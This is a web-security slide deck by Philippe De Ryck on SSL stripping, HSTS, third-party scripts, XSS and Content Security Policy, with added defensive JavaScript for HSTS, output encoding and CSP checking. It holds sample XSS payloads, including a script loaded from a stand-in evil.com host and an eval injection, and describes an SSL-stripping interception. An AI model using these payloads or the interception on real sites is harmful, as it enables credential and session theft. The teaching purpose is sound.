Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe
Philippe De Ryck, @PhilippeDeRyck, https://www.websec.be


Page 1: Why Traditional Web Security Technologies no Longer ... · Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Philippe De Ryck @PhilippeDeRyck

Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe
Philippe De Ryck

@PhilippeDeRyck https://www.websec.be

Page 2

Which Scenario Would You Trust?

(a) Visit website, browse public pages → Login with username and password → Consult private information

(b) Visit website, browse public pages → Login with username and password → Consult private information

(c) Visit website, browse public pages → Login with username and password → Consult private information

Page 3

About Me – Philippe De Ryck

§ Postdoctoral Researcher @ DistriNet (KU Leuven)
§ PhD on client-side Web security
§ Expert in the broad field of Web security
§ Main author of the Primer on Client-Side Web Security

§ Running the Web Security training program
§ Dissemination of knowledge and research results
§ Public training courses and targeted in-house training
§ Target audiences include industry and researchers

§ Part of the organizing committee of SecAppDev.org
§ Week-long course focused on practical security

https://www.websec.be
@PhilippeDeRyck

Page 4

Page 5

The Web Used to Be Server-Centric

Page 6

With a lot of Server-Side Problems

http://arstechnica.com/security/2015/12/hackers-actively-exploit-critical-vulnerability-in-sites-running-joomla/

Page 7

With a lot of Server-Side Problems

http://motherboard.vice.com/read/one-of-the-largest-hacks-yet-exposes-data-on-hundreds-of-thousands-of-kids

Page 8

Page 9

Page 10

Page 11

The Web has Become Client-Centric

Page 12

The Network Can no Longer Be Trusted

Page 13

Networks Are Everywhere

§ We happily connect to any wifi network we can find
§ Without knowing who has control over the network

§ Upstream networks are easily intercepted nowadays
§ Intercepting proxies at the network perimeter
§ ISPs inspecting and manipulating traffic
§ State agencies tapping the backbone

Page 14

The Communication Channel Is Insecure

§ People are mainly concerned about eavesdropping attacks
§ Sniffing usernames, passwords, session identifiers, …
§ Demonstrated in 2010 by the Firesheep add-on

http://codebutler.com/firesheep/

Page 15

The Communication Channel Is Insecure

§ People are mainly concerned about eavesdropping attacks
§ Sniffing usernames, passwords, session identifiers, …
§ Demonstrated in 2010 by the Firesheep add-on
§ Generally prevented by using HTTPS for sensitive data

§ But today, active network attacks are just as easy to execute
§ Man-on-the-side attacks inject traffic into the network
§ Man-in-the-middle attacks intercept and manipulate traffic

§ Simply using HTTPS for sensitive data no longer suffices

Page 16

Care to Reconsider your Previous Answer?

(a) Visit website, browse public pages → Login with username and password → Consult private information

(b) Visit website, browse public pages → Login with username and password → Consult private information

(c) Visit website, browse public pages → Login with username and password → Consult private information

Page 17

Averting the Use of HTTPS

Page 18

Stripping HTTPS from Login Forms

Between the user and the man in the middle:
  Visit http://some-shop.com
  Welcome, please log in
  Login as Philippe
  Welcome Philippe

Between the man in the middle and some-shop.com:
  Visit http://some-shop.com
  Welcome, please log in
  Login as Philippe
  Welcome Philippe

Man in the middle: Rewrite HTTPS to HTTP

Page 19

HTTPS Prevents Man in the Middle Attacks

Between the user and the man in the middle:
  Visit https://some-shop.com
  Welcome, please log in
  Login as Philippe
  Welcome Philippe

Between the man in the middle and some-shop.com:
  Visit https://some-shop.com
  Welcome, please log in
  Login as Philippe
  Welcome Philippe

Page 20

HTTPS Prevents Man in the Middle Attacks?

http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html

Page 21

Bootstrapping the HTTPS Site

Browser → man in the middle:        GET http://some-shop.com
Man in the middle → some-shop.com:  GET http://…
some-shop.com → man in the middle:  301 Moved
Man in the middle → some-shop.com:  GET https://…
some-shop.com → man in the middle:  200 OK
Man in the middle:                  Rewrite HTTPS URLs
Man in the middle → browser:        200 OK, Response page
Browser → man in the middle:        POST http://some-shop.com (User: philippe & pass: pazzw0rd)
Man in the middle → some-shop.com:  POST https://…

Page 22

SSL Stripping Is a Sneaky Attack

Page 23

HTTP Strict Transport Security (HSTS)

§ Instruct the browser to only visit a site over HTTPS
§ Once enabled, no HTTP requests will be sent anymore
§ Prevents SSL stripping attacks
§ Prevents cookie stealing over HTTP

Browser → websec.be:  GET https://websec.be
websec.be → browser:  200 OK, Response page

Page 24

HTTP Strict Transport Security (HSTS)

§ HSTS is a server-driven, browser-enforced security policy
§ Server sends the Strict-Transport-Security response header
  • Only if received over an error-free channel

§ The protection is only applied for the duration of max-age
§ Make sure this value covers non-frequent visitors
§ The value 0 disables the HSTS policy for this particular host

Strict-Transport-Security: max-age=31536000; includeSubdomains

Browser support table ("From version …"): the browser icons did not survive extraction, so the per-browser versions cannot be recovered here.

Page 25

HSTS in Action

Browser → websec.be:      GET https://websec.be
websec.be → browser:      200 OK, Response page
                          Strict-Transport-Security: max-age=31536000; includeSubdomains

Browser → websec.be:      GET https://websec.be
websec.be → browser:      200 OK, Response page
                          Strict-Transport-Security: max-age=31536000; includeSubdomains

Browser → www.websec.be:  GET https://www.websec.be
www.websec.be → browser:  200 OK, Response page
                          Strict-Transport-Security: max-age=31536000; includeSubdomains

Page 26

The Bootstrapping Problem … Again

(Same exchange as on page 25.)

Page 27

Preloading HSTS

§ The bootstrapping problem is solved by a preloaded list
§ Contains all sites that have explicitly subscribed to HSTS
§ Distributed along with the browsers
§ Available on https://hstspreload.appspot.com/
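As an added illustration of pages 23 to 27 (not code from the slides), this Node.js model shows how a browser stores and applies HSTS: the header is ignored over plain HTTP or a channel with errors, max-age=0 clears the entry, includeSubdomains covers child hosts, a preloaded host is protected on its very first request, and a host with no entry yet is exactly the bootstrapping window. The host names, timestamps and the store API are constructed for the example.

```javascript
// Parse a Strict-Transport-Security header value into { maxAge, includeSubdomains }.
// Returns null when the header is unusable (no valid max-age), as a browser would.
function parseHsts(headerValue) {
  const policy = { maxAge: null, includeSubdomains: false };
  for (const rawDirective of headerValue.split(';')) {
    const directive = rawDirective.trim();
    if (directive === '') continue;
    const [name, value] = directive.split('=').map((s) => s.trim());
    if (name.toLowerCase() === 'max-age') {
      if (!/^\d+$/.test(value || '')) return null;
      policy.maxAge = Number(value);
    } else if (name.toLowerCase() === 'includesubdomains') {
      policy.includeSubdomains = true;
    } // unknown directives are ignored
  }
  return policy.maxAge === null ? null : policy;
}

// A browser's HSTS store; `preloaded` stands in for the preload list shipped with the browser.
class HstsStore {
  constructor(preloaded = []) {
    this.entries = new Map(); // host -> { expires (ms since epoch), includeSubdomains }
    for (const host of preloaded) {
      this.entries.set(host, { expires: Infinity, includeSubdomains: true });
    }
  }

  // Called for every response. The header only counts when the response came over
  // HTTPS on an error-free channel; over plain HTTP an attacker could have injected it.
  observeResponse(responseUrl, hstsHeader, channelErrorFree, now) {
    const url = new URL(responseUrl);
    if (url.protocol !== 'https:' || !channelErrorFree || hstsHeader == null) return;
    const policy = parseHsts(hstsHeader);
    if (policy === null) return;
    if (policy.maxAge === 0) {
      this.entries.delete(url.hostname); // max-age=0 removes the policy for this host
      return;
    }
    this.entries.set(url.hostname, {
      expires: now + policy.maxAge * 1000,
      includeSubdomains: policy.includeSubdomains,
    });
  }

  // What the browser will actually request for an http:// URL: upgraded to https://
  // if a live policy covers the host (directly, or via includeSubdomains on a parent).
  rewriteRequest(requestUrl, now) {
    const url = new URL(requestUrl);
    if (url.protocol !== 'http:') return url.href;
    const labels = url.hostname.split('.');
    for (let i = 0; i < labels.length; i++) {
      const entry = this.entries.get(labels.slice(i).join('.'));
      if (!entry || entry.expires <= now) continue;
      if (i === 0 || entry.includeSubdomains) {
        url.protocol = 'https:';
        return url.href;
      }
    }
    return url.href; // no policy known yet: this is the window SSL stripping exploits
  }
}
```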

Page 28

HTTPS Should Be Enabled by Default

§ Browser vendors are strongly pushing towards HTTPS
§ Firefox marks HTTP pages with password fields as insecure
§ Google uses HTTPS as a ranking signal in its search engine
§ Active mixed content is blocked in modern browsers

§ Chrome and Firefox will support Secure Contexts
§ A Secure Context is delivered over HTTPS, including its parents
§ Powerful features will only be exposed to a Secure Context
  • E.g. Geolocation, microphone and camera access, …

Page 29

Hardening your HTTPS Deployment

§ Fine-tune the supported protocols and ciphers
§ Disable the old and obsolete SSLv2 and SSLv3
§ Avoid the use of old and weak ciphers

§ Move all your traffic to HTTPS
§ Immediately redirect all HTTP traffic to HTTPS
§ Prevent SSL stripping by enabling Strict Transport Security (HSTS)

§ If you want to go all out, enable Public Key Pinning (HPKP)
§ Prevents impersonation attacks with rogue but valid certificates

https://www.ssllabs.com/ssltest/

Page 30

Insecure Third-Party Content Can Be Disastrous

Page 31

Browsers Do More than Rendering HTML

§ Modern browsers are full-fledged application platforms
§ Plenty of system features are exposed to Web applications
  • Battery status, Vibration, Geolocation, Microphone & Camera, …
§ ChromeOS and FirefoxOS run all applications inside a browser

§ The key enabler for all of this functionality is JavaScript
§ Since its introduction in 1995, JS has finally taken over the Web
§ Plugins like Flash and Silverlight are slowly fading away

§ So, how about security?
§ We have the same-origin policy, but it's 20 years old …

Page 32

The Same-Origin Policy

Contexts in the diagram: http://example.com (three contexts), http://private.example.com (two contexts), http://forum.example.com

SAME-ORIGIN POLICY: Content retrieved from one origin can freely interact with other content from that origin, but interactions with content from other origins are restricted.

ORIGIN: The triple <scheme, host, port> derived from the document's URL. For http://example.org/forum/, the origin is <http, example.org, 80>.

Page 33

Origins, Frames and Scripts

§ The browser enforces origin-based separation
§ Frames have a context, a document URL and an associated context
§ Scripts are loaded into the context of the including page

§ Classical trade-off between isolation and flexibility

Diagram: a page at http://example.com frames http://malvertisements.com, which gets its own context, and includes script code from http://malvertisements.com, which runs inside the http://example.com context:

<iframe src="http://malvertisements.com/pwnme.html">

<script src="http://malvertisements.com/pwnme.js">

Page 34

The Same-Origin Policy in Practice

§ Most content integration is script-based
§ Included directly into the application's context
§ Which makes sense for libraries, such as jQuery
§ But not for standalone third-party components

§ Every included script is a security risk
§ Because it has full access to your context
§ So you have to trust the supplier
§ And the security of their systems

Page 35

https://medium.com/@FredericJacobs/the-reuters-compromise-by-the-syrian-electronic-army-6bf570e1a85b

Page 36

Responsibly Including Third-Party Content

§ Isolate the content in a context with a different origin
§ Let the Same-Origin Policy protect you
§ Enable interaction by exchanging messages between contexts

§ Further restrict the isolated context using the HTML5 Sandbox
§ Allows you to disable certain features in a framed context
§ Allows you to place your own content in a unique origin

§ Verify the integrity of content loaded from a CDN
§ Enabled by the brand new Subresource Integrity specification
§ Prevents malware distribution through a compromised CDN

https://blogs.dropbox.com/tech/2015/09/csp-third-party-integrations-and-privilege-separation/

Page 37

With XSS, the Attacker Includes the Code for You

Add review → "Thanks for the review!" (stored under reviews)

Review text submitted: I can really recommend product X. It is awesome!<script>alert('Never gonna let you down!')</script>

Show Reviews → Reviews page: <html><body>… …</body></html>

Page 38

http://blog.detectify.com/post/39209711597/how-i-got-a-3500-usd-facebook-bug-bounty

Page 39

http://www.zdnet.com/article/ubuntu-forums-hacked-1-82m-logins-email-addresses-stolen/

Page 40

Traditional XSS Defenses

§ The server compiles data and code into a single HTML page
§ XSS causes the browser to mistake data for code
§ The proper defense is context-sensitive output encoding

§ Encode for the context where the data will be used
§ HTML body: <h1>DATA</h1>
§ HTML attributes: <div id='DATA'>
§ Stylesheet context: body { background-color: DATA; }
§ Script context: alert("DATA");
§ URL context: <a href="http://…?arg=DATA">
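Added example (not the slides' code): one encoder per context listed above, plus a small template helper that refuses to emit data for which the caller did not name a context. The review text from page 37 is the constructed sample input; the helper's placeholder syntax is an assumption of this example.

```javascript
// HTML body context: <h1>DATA</h1>
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// HTML attribute context: <div id='DATA'>. Everything but [A-Za-z0-9] becomes &#xHH;, so the
// value cannot close the attribute whichever quote style (or none) the template used.
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16).toUpperCase()};`);
}

// Script context, inside a string literal: alert("DATA"). \xHH and \uHHHH escapes keep quotes,
// backslashes, newlines and "</script>" from ending the literal or the script block.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? `\\x${code.toString(16).padStart(2, '0')}` : `\\u${code.toString(16).padStart(4, '0')}`;
  });
}

// Stylesheet context: body { background-color: DATA; }. CSS hex escape with a terminating space.
function encodeCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `\\${c.charCodeAt(0).toString(16)} `);
}

// URL context, as a query parameter value: <a href="http://…?arg=DATA">. This is only right for
// a parameter value; data that becomes the whole href also needs a scheme allow-list.
function encodeUrlParam(s) {
  return encodeURIComponent(String(s));
}

const ENCODERS = { html: encodeHtml, attr: encodeHtmlAttr, js: encodeJsString, css: encodeCss, url: encodeUrlParam };

// render('<h1>{{html:title}}</h1>', { title }): every placeholder names its context, and an
// unknown context or a missing value is an error rather than unencoded output.
function render(template, data) {
  return template.replace(/\{\{(\w+):(\w+)\}\}/g, (_, context, key) => {
    const encoder = ENCODERS[context];
    if (encoder === undefined) throw new Error(`unknown output context: ${context}`);
    if (!(key in data)) throw new Error(`missing value: ${key}`);
    return encoder(data[key]);
  });
}

// Constructed sample: the review submitted on the XSS slide, rendered in all five contexts.
const REVIEW = "I can really recommend product X. It is awesome!<script>alert('Never gonna let you down!')</script>";

function renderReview(review) {
  return render(
    '<li>{{html:r}}</li>\n<div id=\'{{attr:r}}\'></div>\n<script>var r = "{{js:r}}";</script>\n' +
    '<style>body { background-color: {{css:r}}; }</style>\n<a href="http://some-shop.com/?arg={{url:r}}">',
    { r: review });
}
```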

Page 41

Content Security Policy against XSS

XSS WITH INLINE SCRIPTS
<h1>You searched for <script>alert('XSS');</script></h1>

XSS WITH REMOTE SCRIPTS
<h1>You searched for <script src="https://evil.com/hackme.js"></script></h1>

XSS WITH EVAL
eval('alert("Your query string was ' + unescape(document.location.search) + '");');
(callout on the slide: a query string of hello%22);alert(1+%22)

Page 42

The Essence of CSP

§ CSP reduces the harm of content injection vulnerabilities
§ By telling the client where resources should be loaded from
§ By disabling "dangerous features" by default
§ CSP is intended as a second line of defense

§ CSP will become more important in the future
§ Supporting CSP in your application may be non-trivial
§ Use of inline script blocks is disallowed
§ Use of eval is disallowed

Page 43

Introducing CSP by Example

EXAMPLE POLICY
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdnjs.cloudflare.com; style-src 'self' https://cdnjs.cloudflare.com/…/bootstrap.min.css;

§ A policy consists of a set of directives
§ Each directive controls a different kind of resource
§ Policy is delivered as an HTTP header by the server
  • Alternatively, the meta tag can also be used
§ Compatible browsers will enforce the policy on the response
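Added example covering both the origin triple from page 32 and the policy format on this slide (not code from the slides): a simplified Node.js evaluator that parses a CSP header into directives, falls back to default-src, resolves 'self' against the document's <scheme, host, port> origin, and decides whether a resource load or an inline block is allowed. Nonces and hashes are out of scope; the sample policy and its CSS path are constructed rather than the slide's elided one.

```javascript
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// The <scheme, host, port> origin triple, with the default port filled in.
function originOf(urlString) {
  const url = new URL(urlString);
  return { scheme: url.protocol, host: url.hostname, port: url.port || DEFAULT_PORTS[url.protocol] || '' };
}

function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// "default-src 'self'; script-src 'self' https://cdn.example" ->
// Map { 'default-src' => ["'self'"], 'script-src' => ["'self'", 'https://cdn.example'] }
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1)); // duplicate directive: first wins
  }
  return directives;
}

// host-source, simplified: [scheme://]host[:port][/path]; host may start with "*."
const HOST_SOURCE = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.[^\/:*]+|[^\/:*]+)(?::(\d+))?(\/\S*)?$/i;

function sourceMatches(source, resourceUrl, documentUrl) {
  if (source === "'self'") return sameOrigin(resourceUrl, documentUrl);
  if (source.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes: never a URL match
  const m = HOST_SOURCE.exec(source);
  if (m === null) return false;
  const [, scheme, host, port, path] = m;
  const res = originOf(resourceUrl);
  const wantScheme = scheme ? `${scheme.toLowerCase()}:` : originOf(documentUrl).scheme;
  if (res.scheme !== wantScheme) return false; // scheme-less sources inherit the page's scheme (simplified)
  const hostOk = host.startsWith('*.') ? res.host.endsWith(host.slice(1).toLowerCase()) : res.host === host.toLowerCase();
  if (!hostOk) return false;
  if ((port || DEFAULT_PORTS[wantScheme] || '') !== res.port) return false;
  const resPath = new URL(resourceUrl).pathname;
  if (path && path !== '/') return path.endsWith('/') ? resPath.startsWith(path) : resPath === path;
  return true;
}

// `type` is the resource kind ('script', 'style', 'img', ...); resourceUrl === null means an inline block.
function cspAllows(header, type, resourceUrl, documentUrl) {
  const directives = parseCsp(header);
  const sources = directives.get(`${type}-src`) || directives.get('default-src');
  if (sources === undefined) return true; // nothing in the policy restricts this resource type
  if (resourceUrl === null) return sources.includes("'unsafe-inline'"); // inline blocks are off by default
  return sources.some((src) => sourceMatches(src, resourceUrl, documentUrl));
}

// Constructed sample with the shape of the policy on this slide (the CSS path is made up).
const SAMPLE_POLICY = "default-src 'self'; script-src 'self' https://cdnjs.cloudflare.com; " +
  "style-src 'self' https://cdnjs.cloudflare.com/libs/bootstrap.min.css";
const PAGE = 'https://some-shop.com/search?q=shoes';
```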

Page 44

CSP is the Security Policy of the Future

§ CSP has been well received, and evolved quickly
§ Addition of plugin types, sandbox, child contexts, form destinations
§ Re-enabling inline script with support for nonces and hashes
§ Deprecates the X-Frame-Options header
§ Supports blocking of mixed content / upgrading insecure requests

§ CSP level 1 is widely supported by browsers
§ Support for level 2 is less widespread, but improving rapidly

§ Chrome makes CSP mandatory for its components
§ Browser extensions and packaged apps

Page 45

CSP Violation Reports

§ CSP can report violations back to the resource server
§ Allows for fine-tuning of the CSP policy
§ Gives insights into actual attacks

§ Enabled by using the report-uri directive
§ Points to a handler on the server that can process reports

EXAMPLE POLICY
Content-Security-Policy: default-src 'self'; report-uri http://some-shop.com/csp-report.cgi
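Added example (not from the slides): the kind of server-side handler a report-uri would point at, written in Node.js. It validates the JSON a browser POSTs, separates browser-extension noise from violations the site can act on, and aggregates counts per directive and blocked URI; the report bodies are constructed samples in the browser's report format, and the class and function names are assumptions of this example.

```javascript
const REQUIRED = ['document-uri', 'violated-directive', 'blocked-uri'];

// Reports whose blocked-uri points at a browser extension cannot be fixed by the site
// and would otherwise drown the real signal; they are counted but not aggregated.
const NOISE_PREFIXES = ['chrome-extension://', 'moz-extension://', 'safari-extension://'];

// Validate one POSTed report body. Returns null for anything that is not a
// well-formed CSP report; a public report endpoint receives plenty of junk.
function parseReport(body) {
  let parsed;
  try { parsed = JSON.parse(body); } catch (e) { return null; }
  const r = parsed && parsed['csp-report'];
  if (!r || typeof r !== 'object') return null;
  if (REQUIRED.some((k) => typeof r[k] !== 'string')) return null;
  const violated = r['violated-directive'];
  return {
    documentUri: r['document-uri'],
    violatedDirective: violated,
    // Older browsers omit effective-directive; the directive name is the first token.
    effectiveDirective: typeof r['effective-directive'] === 'string' ? r['effective-directive'] : violated.split(' ')[0],
    // 'inline' and 'eval' appear here instead of a URL for inline scripts and eval().
    blockedUri: r['blocked-uri'],
    noise: NOISE_PREFIXES.some((p) => r['blocked-uri'].startsWith(p)),
  };
}

class ReportAggregator {
  constructor() { this.counts = new Map(); this.rejected = 0; this.noise = 0; }

  ingest(body) {
    const report = parseReport(body);
    if (report === null) { this.rejected += 1; return null; }
    if (report.noise) { this.noise += 1; return report; }
    const key = `${report.effectiveDirective} ${report.blockedUri}`;
    this.counts.set(key, (this.counts.get(key) || 0) + 1);
    return report;
  }

  // Most frequent violations first: the list to work through when tuning the policy.
  top(n = 5) {
    return [...this.counts.entries()].sort((a, b) => b[1] - a[1]).slice(0, n);
  }
}

// Constructed sample bodies in the JSON format browsers POST to report-uri.
const SAMPLE_REPORTS = [
  JSON.stringify({ 'csp-report': { 'document-uri': 'https://some-shop.com/reviews', 'violated-directive': "script-src 'self'",
    'effective-directive': 'script-src', 'blocked-uri': 'https://evil.com/hackme.js' } }),
  JSON.stringify({ 'csp-report': { 'document-uri': 'https://some-shop.com/reviews', 'violated-directive': "script-src 'self'",
    'effective-directive': 'script-src', 'blocked-uri': 'https://evil.com/hackme.js' } }),
  JSON.stringify({ 'csp-report': { 'document-uri': 'https://some-shop.com/search', 'violated-directive': "default-src 'self'",
    'blocked-uri': 'inline' } }),
  JSON.stringify({ 'csp-report': { 'document-uri': 'https://some-shop.com/', 'violated-directive': "script-src 'self'",
    'effective-directive': 'script-src', 'blocked-uri': 'chrome-extension://abcdefgh/inject.js' } }),
  '{"not": "a report"}',
  'garbage',
];

function summarize(bodies) {
  const agg = new ReportAggregator();
  bodies.forEach((b) => agg.ingest(b));
  return { top: agg.top(), rejected: agg.rejected, noise: agg.noise };
}
```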

Page 46

The Web has Become Client-Centric

Page 47

Progressive Web Security

§ Take a progressive stance towards Web security
§ The Web has become client-centric, and so has Web security
§ Fully protecting your applications requires the latest technologies

§ All of these security technologies require explicit action
§ Training is essential to keep up to date with the latest technologies

§ Share your experiences, help others advance as well
§ Set an example on how to do it right

Page 48

I hope you learned something tonight … Now it's up to you

Grab a copy of the slides and share with anyone you can find

Read my blog or follow me on Twitter to stay informed about web security

Level up with Web security training!

All information on https://www.websec.be

Page 49

Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe
Acknowledgements

Icons by Visual Pharm (https://icons8.com)

Images by Unsplash (https://unsplash.com/)

Page 50

Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe
Philippe De Ryck

[email protected]

/in/philippederyck

https://www.websec.be

@PhilippeDeRyck